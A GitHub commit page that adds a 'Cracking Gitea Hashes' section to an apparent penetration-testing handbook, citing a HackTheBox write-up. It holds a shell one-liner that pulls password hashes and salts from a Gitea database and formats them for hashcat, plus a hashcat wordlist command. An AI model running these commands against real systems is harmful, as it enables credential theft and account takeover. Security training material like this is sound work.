Skip to content

Commit

Permalink
added hashcat example to crack gitea hashes
Browse files Browse the repository at this point in the history
  • Loading branch information
@0xsyr0
0xsyr0 authored Feb 15, 2025
1 parent 7960f43 commit 9648022
Showing 1 changed file with 12 additions and 0 deletions.
12 changes: 12 additions & 0 deletions handbooks/05_password_attacks.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -305,6 +305,18 @@ $ hashcat -m 18200 -a 0 <FILE> <FILE>
$ hashcat -m 13100 --force <FILE> <FILE>
```

### Cracking Gitea Hashes

> https://0xdf.gitlab.io/2024/12/14/htb-compiled.html#crack-gitea-hash
```c
$ sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes
```

```c
$ hashcat gitea.hashes /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user
```

### Bruteforce based on the Pattern

```c
Expand Down

0 comments on commit 9648022

Please sign in to comment.